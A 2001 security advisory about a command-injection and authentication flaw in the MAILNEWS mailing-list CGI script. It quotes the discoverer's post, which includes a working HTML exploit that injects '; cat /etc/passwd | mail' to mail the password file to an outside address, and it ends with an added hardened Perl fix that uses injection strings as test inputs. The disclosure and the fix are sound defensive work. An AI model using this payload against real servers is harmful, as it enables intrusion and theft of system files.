Mailnews Cgi Script May Execute Arbitrary Shell Commands Supplied By Unauthorized Users Via the Network
SecurityTracker Alert ID: 1000949 |
SecurityTracker URL: http://securitytracker.com/id/1000949
CVE Reference:
GENERIC-MAP-NOMATCH
Updated: Feb 28 2001
Original Entry Date: Feb 21 2001
Impact:
Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Version(s): 1.1, 1.3
Description:
The CGI-based MAILNEWS mailing list management software reportedly contains several vulnerabilities that allow a remote attacker to supply shell commands that the CGI script will execute.
Potentially the most serious vulnerability is that the software fails to filter certain input parameters appropriately, so an attacker can supply arbitrary shell commands that the CGI script then executes. In addition, the script does not properly protect and enforce passwords, so an unauthorized user without knowledge of the administrative password can add or delete users from an affected maillist.
The original message contains demonstration exploit code.
Impact:
An attacker can remotely provide shell commands to be executed by the cgi script with the privileges of the cgi script.
Solution:
No solution was available at the time of this entry.
Vendor URL: www.creuter.lu/programming/perl/index.asp
Cause:
Authentication error, Input validation error
Underlying OS:
Linux (Any), MacOS, UNIX (Any), Windows (Any)
Message History:
None.
Source Message Contents
Date: Sun, 18 Feb 2001 22:04:54 +0000
Subject: CGI - mailnews.cgi vulnerability...
Hello BuGReaders...
##Script: mailnews.cgi
##Introduction:
<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>
##Tested Version: 1.1, 1.3
The author doesn't parse some characters and he uses a very stupid "password
protection". We can add or delete users from the maillist without knowing the
admin password. But this is a small problem ;] . Let's see what more we can
do.
<cat source>
open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
where $mailprog [default] is sendmail and $member is the users from the usersfile.
Now we can do something like this. Add the user "; cat /etc/passwd | mail
adam@malysz.pl" and use the subroutine to execute this code :]
Simple exploit in HTML:
<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ; [ex:" ; cat /etc/passwd |mail adam@malysz.pl"
without quotes of course ]<INPUT NAME="address" TYPE="TEXT">
<INPUT TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>
Who : Kanedaaa
kaneda@ac.pl
***$$$### " And maybe very many will not understand these words...
But there is no mercy for SONS OF BITCHES .... " ###$$*
kaneda@ac.pl Hero ... Boss ... Abuser ... Cucumber Team Member... Bzz..
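
The unfiltered open (MAIL, "|$mailprog $member") call quoted in the message above, rewritten defensively as an added example (not MAILNEWS code and not part of the original post): the address is checked against an allow-list and sendmail is started with a list-form pipe open, so no shell ever parses the subscriber address. The sendmail path, the sub names and the sample inputs are assumptions constructed for illustration, and the list-form pipe open assumes a Unix-like host.

```perl
#!/usr/bin/perl
# Added example, not MAILNEWS code: a hardened form of
#   open (MAIL, "|$mailprog $member")
use strict;
use warnings;

# Assumption: a sendmail-compatible binary lives at this path.
my $mailprog = '/usr/sbin/sendmail';

# Conservative allow-list for a subscriber address. The first character must
# be alphanumeric, so the value can never look like a command-line option,
# and \A ... \z anchor the whole string ("$" would accept a trailing newline).
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._+-]*
                     \@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/x ? 1 : 0;
}

# List-form pipe open: Perl executes $mailprog directly and passes every list
# element as exactly one argv entry. No /bin/sh is started, so ';' and '|'
# inside $member are never interpreted. '--' ends sendmail option parsing.
sub open_mail_pipe {
    my ($member) = @_;
    die "rejected address\n" unless valid_address($member);
    open(my $mail, '|-', $mailprog, '-oi', '--', $member)
        or die "Can't run $mailprog: $!\n";
    return $mail;    # caller prints headers and body, then close()s the handle
}

# Constructed sample inputs: one ordinary address and three values the
# subscribe handler should refuse before they reach the users file.
my @samples = (
    'reader@example.org',
    'reader@example.org; echo x',
    '-bp',
    "reader\@example.org\nBcc: other\@example.org",
);

for my $candidate (@samples) {
    (my $shown = $candidate) =~ s/\n/\\n/g;    # keep the report on one line
    printf "%-45s %s\n", $shown,
        valid_address($candidate) ? 'accepted' : 'rejected';
}
```

Applying the same check when an address is written to the users file, and again when it is read back before mailing, covers entries that were stored before the fix.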